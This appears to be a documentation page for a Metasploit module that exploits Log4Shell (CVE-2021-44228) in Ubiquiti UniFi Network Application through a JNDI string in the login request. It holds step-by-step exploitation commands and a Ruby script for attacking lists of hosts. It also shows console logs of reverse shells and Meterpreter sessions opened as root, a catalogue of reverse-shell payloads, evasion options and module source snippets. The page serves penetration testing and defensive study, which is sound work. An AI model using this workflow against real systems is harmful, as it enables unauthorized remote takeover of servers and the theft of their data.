UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell) - Metasploit


This page contains detailed information about how to use the exploit/multi/http/ubiquiti_unifi_log4shell metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)
Module: exploit/multi/http/ubiquiti_unifi_log4shell
Source code: modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
Disclosure date: 2021-12-09
Last modification time: 2022-03-11 12:22:27 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2021-44228

This module is also known as Log4Shell or LogJam.

The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell vulnerability whereby a JNDI string can be sent to the server via the 'remember' field of a POST request to the /api/login endpoint that will cause the server to connect to the attacker and deserialize a malicious Java object. This results in OS command execution in the context of the server application. This module will start an LDAP server that the target will need to connect to.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


Using ubiquiti_unifi_log4shell against a single host

Normally, you can use exploit/multi/http/ubiquiti_unifi_log4shell this way:

msf > use exploit/multi/http/ubiquiti_unifi_log4shell
msf exploit(ubiquiti_unifi_log4shell) > show targets
    ... a list of targets ...
msf exploit(ubiquiti_unifi_log4shell) > set TARGET target-id
msf exploit(ubiquiti_unifi_log4shell) > show options
    ... show and set options ...
msf exploit(ubiquiti_unifi_log4shell) > exploit

Using ubiquiti_unifi_log4shell against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your ubiquiti_unifi_log4shell will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/http/ubiquiti_unifi_log4shell")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

Knowledge Base


Vulnerable Application


Description

The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell vulnerability whereby a JNDI string can be sent to the server via the 'remember' field of a POST request to the /api/login endpoint that will cause the server to connect to the attacker and deserialize a malicious Java object. This results in OS command execution in the context of the server application.

This module will start an LDAP server that the target will need to connect to.

Setup

  1. Either install the Windows application, or start the docker container (use jacobalberty/unifi:v6.5.53).
  2. Navigate to the service on HTTPS port 8443 to setup the UniFi controller.
  3. On step 2, select the button to "Switch to Advanced Setup"
  4. While still on step 2, disable the remote access and "Use your Ubiquiti account for local access" options, then create a local account.
  5. On step 5, when prompted to setup WiFi, select the "Skip" button in the bottom right corner.
  6. Review the configuration, and finalize it.

Older versions of the UniFi Network Application can be downloaded from community.ui.com.

Verification Steps


  1. Start msfconsole
  2. Do: use exploit/multi/http/ubiquiti_unifi_log4shell
  3. Set the RHOSTS, TARGET, PAYLOAD, and payload associated options
  4. Do: run
  5. If the target is vulnerable, the payload should be executed

Scenarios


UniFi Network Application v6.6.53 on Docker

This uses jacobalberty/unifi:v6.5.53. Note that tags v6.5.54, v6.0.45, and v5.14.23 all contain the fix for this vulnerability. See jacobalberty/unifi for more information.

msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell 
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set TARGET Unix
TARGET => Unix
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set RHOST 192.168.250.6
RHOST => 192.168.250.6
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set SRVHOST 192.168.250.134
SRVHOST => 192.168.250.134
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set LHOST 192.168.250.134
LHOST => 192.168.250.134
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set PAYLOAD cmd/unix/reverse_bash
PAYLOAD => cmd/unix/reverse_bash
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set RPORT 8443
RPORT => 8443
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > exploit

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Command shell session 5 opened (192.168.250.134:4444 -> 192.168.250.6:44984 ) at 2022-01-14 09:21:04 -0500
[*] Server stopped.

id
uid=0(root) gid=0(root) groups=0(root)
pwd
/usr/lib/unifi

UniFi Network Application v6.5.53 on Windows Server 2016

msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set TARGET Windows
TARGET => Windows
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set RHOST 192.168.159.65
RHOST => 192.168.159.65
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set SRVHOST 192.168.159.128
SRVHOST => 192.168.159.128
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set RPORT 8443
RPORT => 8443
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Sending stage (175174 bytes) to 192.168.159.65
[*] Meterpreter session 4 opened (192.168.159.128:4444 -> 192.168.159.65:51940 ) at 2022-01-14 09:19:25 -0500
[*] Server stopped.

meterpreter > getuid
Server username: WIN-BPID95ACQ7E\smcintyre
meterpreter > sysinfo
Computer        : WIN-BPID95ACQ7E
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 

UniFi Network Application v5.14.22 on OSX 11.2.3

msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > show options

Module options (exploit/multi/http/ubiquiti_unifi_log4shell):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   LDIF_FILE                   no        Directory LDIF file path
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     111.111.1.11     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      8443             yes       The target port (TCP)
   SRVHOST    222.222.2.222    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    389              yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_zsh):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  222.222.2.222    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   Unix


msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > run

[*] Started reverse TCP handler on 222.222.2.222:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Client sent unexpected request 2
[*] Command shell session 2 opened (222.222.2.222:4444 -> 111.111.1.11:50474 ) at 2022-01-20 07:20:22 -0500
[*] Server stopped.

id
uid=501(yourmom) gid=20(staff) groups=20(staff),501(access_bpf),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),399(com.apple.access_ssh),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),400(com.apple.access_remote_ae)

Go back to menu.

Msfconsole Usage


Here is how the multi/http/ubiquiti_unifi_log4shell exploit module looks in the msfconsole:

msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell

[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > show info

       Name: UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)
     Module: exploit/multi/http/ubiquiti_unifi_log4shell
   Platform: 
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2021-12-09

Provided by:
  Spencer McIntyre
  RageLtMan <rageltman@sempervictus>
  Nicholas Anastasi

Module side effects:
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Windows
  1   Unix

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  LDIF_FILE                   no        Directory LDIF file path
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      8443             yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    389              yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       Base path
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  The Ubiquiti UniFi Network Application versions 5.13.29 through 
  6.5.53 are affected by the Log4Shell vulnerability whereby a JNDI 
  string can be sent to the server via the 'remember' field of a POST 
  request to the /api/login endpoint that will cause the server to 
  connect to the attacker and deserialize a malicious Java object. 
  This results in OS command execution in the context of the server 
  application. This module will start an LDAP server that the target 
  will need to connect to.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-44228
  https://www.sprocketsecurity.com/blog/another-log4j-on-the-fire-unifi
  https://github.com/puzzlepeaches/Log4jUnifi
  https://community.ui.com/releases/UniFi-Network-Application-6-5-54/d717f241-48bb-4979-8b10-99db36ddabe1

Also known as:
  Log4Shell
  LogJam

Module Options


This is a complete list of options available in the multi/http/ubiquiti_unifi_log4shell exploit:

msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > show options

Module options (exploit/multi/http/ubiquiti_unifi_log4shell):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   LDIF_FILE                   no        Directory LDIF file path
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      8443             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    389              yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Unix

Advanced Options


Here is a complete list of advanced options supported by the multi/http/ubiquiti_unifi_log4shell exploit:

msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > show advanced

Module advanced options (exploit/multi/http/ubiquiti_unifi_log4shell):

   Name                                    Current Setting                                     Required  Description
   ----                                    ---------------                                     --------  -----------
   AddClassPath                                                                                no        Additional java classpath
   AutoCheck                               true                                                no        Run check before exploit
   ContextInformationFile                                                                      no        The information file that contains context information
   DOMAIN                                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS                           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler                   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding                   false                                               no        Use transient context when encoding payloads
   FingerprintCheck                        true                                                no        Conduct a pre-exploit fingerprint verification
   ForceExploit                            false                                               no        Override check result
   HttpClientTimeout                                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace                               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors                         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly                    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                                no        The HTTP username to specify for authentication
   JavaCache                               /home/kali/.msf4/javacache                          yes       Java cache location
   LDAP_AUTH_BYPASS                        true                                                yes       Ignore LDAP client authentication
   LdapServerTcp                           true                                                yes       Serve TCP LDAP requests
   LdapServerUdp                           true                                                yes       Serve UDP LDAP requests
   ListenerComm                                                                                no        The specific communication channel to use for this service
   Powershell::encode_final_payload        false                                               yes       Encode final payload for -EncodedCommand
   Powershell::encode_inner_payload        false                                               yes       Encode inner payload for -EncodedCommand
   Powershell::exec_in_place               false                                               yes       Produce PSH without executable wrapper
   Powershell::exec_rc4                    false                                               yes       Encrypt PSH with RC4
   Powershell::method                      reflection                                          yes       Payload delivery method (Accepted: net, reflection, old, msil)
   Powershell::no_equals                   false                                               yes       Pad base64 until no "=" remains
   Powershell::noninteractive              true                                                yes       Execute powershell without interaction
   Powershell::persist                     false                                               yes       Run the payload in a loop
   Powershell::prepend_protections_bypass  auto                                                yes       Prepend AMSI/SBL bypass (Accepted: auto, true, false)
   Powershell::prepend_sleep                                                                   no        Prepend seconds of sleep
   Powershell::remove_comspec              false                                               yes       Produce script calling powershell directly
   Powershell::strip_comments              true                                                yes       Strip comments
   Powershell::strip_whitespace            false                                               yes       Strip whitespace
   Powershell::sub_funcs                   false                                               yes       Substitute function names
   Powershell::sub_vars                    true                                                yes       Substitute variable names
   Powershell::wrap_double_quotes          true                                                yes       Wraps the -Command argument in single quotes
   SSLVersion                              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted:
                                                                                                          Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent                               Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb  no        The User-Agent header to use for all requests
                                           Kit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69
                                            Safari/537.36
   VERBOSE                                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                                   no        Specify the workspace for this module
   WfsDelay                                30                                                  no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/reverse_bash):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/http/ubiquiti_unifi_log4shell module can exploit:

msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows
   1   Unix

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/ubiquiti_unifi_log4shell exploit:

msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   2   payload/cmd/unix/bind_jjs                                    normal  No     Unix Command Shell, Bind TCP (via jjs)
   3   payload/cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
   4   payload/cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
   5   payload/cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   6   payload/cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   7   payload/cmd/unix/bind_nodejs                                 normal  No     Unix Command Shell, Bind TCP (via nodejs)
   8   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   9   payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   10  payload/cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
   11  payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   12  payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   13  payload/cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
   14  payload/cmd/unix/bind_stub                                   normal  No     Unix Command Shell, Bind TCP (stub)
   15  payload/cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
   16  payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   17  payload/cmd/unix/pingback_bind                               normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   18  payload/cmd/unix/pingback_reverse                            normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   19  payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   20  payload/cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
   21  payload/cmd/unix/reverse_bash                                normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   22  payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   23  payload/cmd/unix/reverse_bash_udp                            normal  No     Unix Command Shell, Reverse UDP (/dev/udp)
   24  payload/cmd/unix/reverse_jjs                                 normal  No     Unix Command Shell, Reverse TCP (via jjs)
   25  payload/cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   26  payload/cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
   27  payload/cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
   28  payload/cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
   29  payload/cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   30  payload/cmd/unix/reverse_nodejs                              normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   31  payload/cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   32  payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   33  payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   34  payload/cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   35  payload/cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
   36  payload/cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   37  payload/cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
   38  payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   39  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   40  payload/cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
   41  payload/cmd/unix/reverse_ssh                                 normal  No     Unix Command Shell, Reverse TCP SSH
   42  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   43  payload/cmd/unix/reverse_stub                                normal  No     Unix Command Shell, Reverse TCP (stub)
   44  payload/cmd/unix/reverse_tclsh                               normal  No     Unix Command Shell, Reverse TCP (via Tclsh)
   45  payload/cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)
   46  payload/generic/custom                                       normal  No     Custom Payload
   47  payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   48  payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
   49  payload/generic/ssh/interact                                 normal  No     Interact with Established SSH Connection

Evasion Options


Here is the full list of possible evasion options supported by the multi/http/ubiquiti_unifi_log4shell exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

No HTTP response was received.


Here is a relevant code snippet related to the "No HTTP response was received." error message:

76:	  end
77:	
78:	  def check
79:	    validate_configuration!
80:	    res = send_request_cgi('uri' => normalize_uri(target_uri, 'status'))
81:	    return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?
82:	
83:	    server_version = res.get_json_document.dig('meta', 'server_version')
84:	    return Exploit::CheckCode::Safe('The target service does not appear to be running.') unless server_version =~ /(\d+\.)+/
85:	
86:	    vprint_status("Detected version: #{server_version}")

The target service does not appear to be running.


Here is a relevant code snippet related to the "The target service does not appear to be running." error message:

79:	    validate_configuration!
80:	    res = send_request_cgi('uri' => normalize_uri(target_uri, 'status'))
81:	    return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?
82:	
83:	    server_version = res.get_json_document.dig('meta', 'server_version')
84:	    return Exploit::CheckCode::Safe('The target service does not appear to be running.') unless server_version =~ /(\d+\.)+/
85:	
86:	    vprint_status("Detected version: #{server_version}")
87:	    server_version = Rex::Version.new(server_version)
88:	    if server_version < Rex::Version.new('5.13.29')
89:	      return Exploit::CheckCode::Safe('Versions prior to 5.13.29 are not exploitable.')

Versions prior to 5.13.29 are not exploitable.


Here is a relevant code snippet related to the "Versions prior to 5.13.29 are not exploitable." error message:

84:	    return Exploit::CheckCode::Safe('The target service does not appear to be running.') unless server_version =~ /(\d+\.)+/
85:	
86:	    vprint_status("Detected version: #{server_version}")
87:	    server_version = Rex::Version.new(server_version)
88:	    if server_version < Rex::Version.new('5.13.29')
89:	      return Exploit::CheckCode::Safe('Versions prior to 5.13.29 are not exploitable.')
90:	    elsif server_version > Rex::Version.new('6.5.53')
91:	      return Exploit::CheckCode::Safe('Versions after 6.5.53 are patched and not affected.')
92:	    end
93:	
94:	    vprint_status('The target appears to be a vulnerable version, attempting to trigger the vulnerability...')

Versions after 6.5.53 are patched and not affected.


Here is a relevant code snippet related to the "Versions after 6.5.53 are patched and not affected." error message:

86:	    vprint_status("Detected version: #{server_version}")
87:	    server_version = Rex::Version.new(server_version)
88:	    if server_version < Rex::Version.new('5.13.29')
89:	      return Exploit::CheckCode::Safe('Versions prior to 5.13.29 are not exploitable.')
90:	    elsif server_version > Rex::Version.new('6.5.53')
91:	      return Exploit::CheckCode::Safe('Versions after 6.5.53 are patched and not affected.')
92:	    end
93:	
94:	    vprint_status('The target appears to be a vulnerable version, attempting to trigger the vulnerability...')
95:	
96:	    start_service

No HTTP response was received.


Here is a relevant code snippet related to the "No HTTP response was received." error message:

93:	
94:	    vprint_status('The target appears to be a vulnerable version, attempting to trigger the vulnerability...')
95:	
96:	    start_service
97:	    res = trigger
98:	    return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?
99:	
100:	    wait_until { @search_received }
101:	    @search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.')
102:	  ensure
103:	    stop_service

No LDAP search query was received.


Here is a relevant code snippet related to the "No LDAP search query was received." error message:

96:	    start_service
97:	    res = trigger
98:	    return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?
99:	
100:	    wait_until { @search_received }
101:	    @search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.')
102:	  ensure
103:	    stop_service
104:	  end
105:	
106:	  def build_ldap_search_response_payload

Failed to trigger the vulnerability


Here is a relevant code snippet related to the "Failed to trigger the vulnerability" error message:

134:	    validate_configuration!
135:	
136:	    @exploiting = true
137:	    start_service
138:	    res = trigger
139:	    fail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil?
140:	
141:	    msg = res.get_json_document.dig('meta', 'msg')
142:	    if res.code == 400 && msg == 'api.err.Invalid' # returned by versions before 5.13.29
143:	      fail_with(Failure::NotVulnerable, 'The target is not vulnerable')
144:	    end

The target is not vulnerable


Here is a relevant code snippet related to the "The target is not vulnerable" error message:

138:	    res = trigger
139:	    fail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil?
140:	
